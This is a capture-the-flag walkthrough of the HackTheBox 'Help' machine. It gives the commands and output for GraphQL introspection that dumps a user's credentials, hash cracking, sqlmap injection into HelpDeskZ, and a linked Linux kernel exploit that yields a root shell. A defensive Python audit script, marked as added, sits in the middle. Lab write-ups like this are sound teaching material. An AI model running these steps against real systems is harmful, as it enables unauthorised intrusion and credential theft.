# Help

Help is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/170) created by cymtrick. In this post, my IP is 10.10.14.23 and the target's IP is 10.129.227.176.

I assume that the machine is pretty random, with the version obtainable only from a "readme" whose existence you only learn about from git... the URL vulnerable to SQLi is really hidden; I didn't like this machine at all.

## Recon

{% code title="Local Terminal" %}

```bash
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n

Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 128
80/tcp open  http    syn-ack ttl 128
3000/tcp open  ppp    syn-ack ttl 128

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
           Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
nmap -sCV -p 22,80 10.129.227.176 -oN Target

Nmap scan report for 10.129.227.176
Host is up (0.021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
whatweb help.htb

http://help.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.227.176],
Title[Apache2 Ubuntu Default Page: It works]
```

{% endcode %}

* Browser:   <http://help.htb>

At this point we have nothing; it is just a website with the default index page, so the best option is to fuzz the target for directories.

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt help.htb/FUZZ
```

{% endcode %}

```bash
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://help.htb/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000041:   301        9 L      28 W       306 Ch      "support"
000001059:   301        9 L      28 W       309 Ch      "javascript"
```

"support" and "javascript": there is virtually nothing here, so let's explore the other port.

> <http://help.htb/support/>
>
> We don't have any credentials or tools to use here...

### Port 3000

> <http://help.htb:3000/>

<figure><img src="/files/tgWPr1GRDhF8PCZst8E2" alt=""><figcaption></figcaption></figure>

All right, this looks like a taunt; let's extract more information.

{% code title="Local Terminal" %}

```bash
$ curl -v http://help.htb:3000/

*   Trying 10.129.227.176:3000...
* Connected to help.htb (10.129.227.176) port 3000 (#0)
> GET / HTTP/1.1
> Host: help.htb:3000
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< X-Powered-By: Express 
< Content-Type: application/json; charset=utf-8
< Content-Length: 81
< ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
< Date: Sun, 09 Jul 2023 15:23:28 GMT
< Connection: keep-alive
<
* Connection #0 to host help.htb left intact
{"message":"Hi Shiv, To get access please find the credentials with given query"}  
```

{% endcode %}

Nothing more from curl, so we fuzz it with a [wordlist specific to APIs](https://gist.github.com/helcaraxeals/7c45201b1c957ecea82ef7800da4bfa4).

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 20 --hc=404 -w /usr/share/wordlists/api.txt help.htb:3000FUZZ
```

{% endcode %}

```bash
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://help.htb:3000FUZZ/
Total requests: 584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000215:   400        0 L      3 W        18 Ch       "/graphql"
000000216:   400        0 L      3 W        18 Ch       "/graphql/console"

Total time: 0
Processed Requests: 562
Filtered Requests: 560
Requests/sec.: 0
```

So there is a GraphQL endpoint on this API; now we can turn to GraphQL-specific techniques.

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql" %}

{% code title="Local Terminal" %}

```bash
└─# curl -s http://help.htb:3000/graphql
GET query missing.
```

{% endcode %}

GraphQL endpoints are usually queried with POST, so intercept the request with **Burp Suite**, change the request method to POST, add the header `Content-Type: application/json`, and send the first suggested payload.

<figure><img src="/files/j78C4LdXESWMwB36FNTa" alt=""><figcaption></figcaption></figure>

It works, and you can do the same with **curl**:

{% code title="Local Terminal" %}

```bash
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .
```

{% endcode %}

```json
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}
```

<figure><img src="/files/qc6r1ItWoH0vlDnrjy2q" alt=""><figcaption></figcaption></figure>

The schema exposes a "User" type, so we list its fields and then dump it.

{% code title="Local Terminal" %}

```bash
curl -s help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .
```

{% endcode %}

```json
{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}
```

{% code title="Local Terminal" %}

```bash
curl -s http://help.htb:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .
```

{% endcode %}

```json
{
  "data": {
    "user": {
      "username": "helpme@helpme.com",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}
```
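The introspection walkthrough above is exactly what a defender should run against their own schema before shipping it with introspection enabled. The following is an added Python example, not code from the original write-up: it parses an introspection response shaped like the one returned by the endpoint (the sample data is constructed inline and mirrors the `Query`/`User` types seen above) and reports object types that expose credential-like fields.

```python
"""Audit a GraphQL introspection result for credential-like fields.

Added example, not part of the original write-up. Input is the JSON body
returned by a query such as:
    { __schema { types { name fields { name } } } }
"""
import json
import re

# Field names that should never be readable through a public API.
SENSITIVE = re.compile(r"(passw|secret|token|hash|api_?key)", re.IGNORECASE)

# Constructed sample: same shape as the endpoint's introspection output,
# with the "User" type's fields filled in from the __type query result.
SAMPLE_INTROSPECTION = json.dumps({
    "data": {"__schema": {"types": [
        {"name": "Query", "fields": [{"name": "user"}]},
        {"name": "User", "fields": [{"name": "username"}, {"name": "password"}]},
        {"name": "String", "fields": None},
        {"name": "Boolean", "fields": None},
        {"name": "__Schema", "fields": [{"name": "types"}]},
        {"name": "__Type", "fields": [{"name": "name"}, {"name": "fields"}]},
    ]}}
})


def user_types(introspection: str) -> dict:
    """Return {type_name: [field names]} for the application's own object types.

    Scalars report fields == None and introspection types start with '__';
    both are skipped so only application types remain.
    """
    schema = json.loads(introspection)["data"]["__schema"]
    return {
        t["name"]: [f["name"] for f in t["fields"]]
        for t in schema["types"]
        if t.get("fields") and not t["name"].startswith("__")
    }


def sensitive_fields(introspection: str) -> list:
    """Return (type, field) pairs whose field name looks like a credential."""
    return [
        (type_name, field)
        for type_name, fields in user_types(introspection).items()
        for field in fields
        if SENSITIVE.search(field)
    ]


if __name__ == "__main__":
    for type_name, field in sensitive_fields(SAMPLE_INTROSPECTION):
        print(f"exposed credential field: {type_name}.{field}")
```

Point it at a saved introspection response from your own API; any hit is a field to remove from the public schema or protect with authorization, and a reason to disable introspection in production.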

We now have an email and a password hash; they should work on the other website, but first we need to crack the hash.

{% embed url="https://crackstation.net/" %}

<figure><img src="/files/f60uamDuKBxXuuLJM1mf" alt=""><figcaption><p>{ helpme@helpme.com : godhelpmeplz }</p></figcaption></figure>

* [http://help.htb/support/](http://help.htb/support/?v=login)

<figure><img src="/files/cDPiCPGYjr4oez2PZcqc" alt=""><figcaption></figcaption></figure>

## Exploitation

### Reverse Shell (Help)

After exploring the website and testing the ticket system, I found nothing... let's just search for "HelpDeskZ GitHub".

{% embed url="https://github.com/sabelosimelane/HelpDeskZ-2.0" %}
There is something about a "readme.html"
{% endembed %}

> <http://help.htb/support/readme.html>

<figure><img src="/files/FxHxgtutgEqOebiHAWQI" alt=""><figcaption><p>Version 1.0.2, search at exploitDB</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
searchsploit HelpDeskZ

-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                             | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                      | php/webapps/41200.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
searchsploit -m 41200.py
```

{% endcode %}

Edit the Python script: add `# -*- coding: utf-8 -*-` as the first line, and change line 94 to `session = requests.session()`.

{% code title="Local Terminal" %}

```bash
python2 41200.py http://help.htb/support helpme@helpme.com godhelpmeplz

------------------------------------------
username:
password: sha256()
Your ticket have to include attachment, probably none atachments found, or prefix is not equal hdz_
try to submit ticket with attachment

```

{% endcode %}

OK, we need to submit another ticket with an attachment, then run the exploit again and wait.

In the end it does not work, but at least now we know the URL where the injection happens.

> <http://help.htb/support/?v=view_tickets&action=ticket&param[]=5&param[]=attachment&param[]=1&param[]=7>

Intercept the attachment download request and save it to a file (saved here as **request**).

<figure><img src="/files/wmUfzHBLwm8dADFGUORR" alt=""><figcaption></figcaption></figure>

Now run sqlmap on the saved request to extract the password hash.

{% code title="Local Terminal" %}

```bash
sqlmap -r request --level 5 --risk 3 -p param[]
```

{% endcode %}

We have the hash; after cracking it the password is { Welcome1 }, so we log in to the machine through SSH.

{% code title="Local Terminal" %}

```bash
$ ssh -l help 10.129.227.176  # Password: Welcome1

$ cat user.txt
4dbb347ce71e1f06251894265c3bdb90
```

{% endcode %}

### Privilege Escalation

We have the first flag; now we run some basic checks for escalation.

{% code title="Target Terminal [help]" %}

```bash
help@help:~$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)

help@help:~$ sudo -l
[sudo] password for help:
Sorry, user help may not run sudo on help.

help@help:~$ cd /
help@help:/$ find / -perm -4000 2>/dev/null
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
<...>

help@help:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.5 LTS
Release:        16.04
Codename:       xenial

help@help:/$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

{% endcode %}

The kernel version shown by **uname -a** is unusually old; searching Exploit-DB for "Linux Kernel 4.4.0-116" turns up an exploit.

Copy the script to /tmp as "exploit.c" (paste it with nano), then compile it with `gcc -o attack exploit.c`.

{% embed url="https://www.exploit-db.com/exploits/44298" %}

{% code title="Target Terminal [root]" %}

```bash
help@help:/tmp$ ./attack
task_struct = ffff88003ba2aa80
uidptr = ffff88003ab0e184
spawning root shell

root@help:/tmp# cat /root/root.txt
62106a044573c82858c99023794af117
```

{% endcode %}

